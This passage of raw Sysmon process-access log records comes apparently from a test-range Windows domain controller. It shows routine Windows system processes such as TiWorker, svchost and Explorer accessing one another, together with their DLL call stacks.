dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.008{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.008{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.992{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.992{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.992{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.976{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.976{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.976{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.961{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.961{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.961{59A5CD1D-93F9-6005-F204-00000000A301}42964840C:\Windows\system32\sihost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+72b5|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.961{59A5CD1D-93F9-6005-F204-00000000A301}42964840C:\Windows\system32\sihost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.961{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.961{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.961{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6d1f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+68be|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6966|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6ab5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000011803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.961{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d4e3|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d7a9|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+badc3|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.961{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+badc3|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:32.961{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+badc3|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 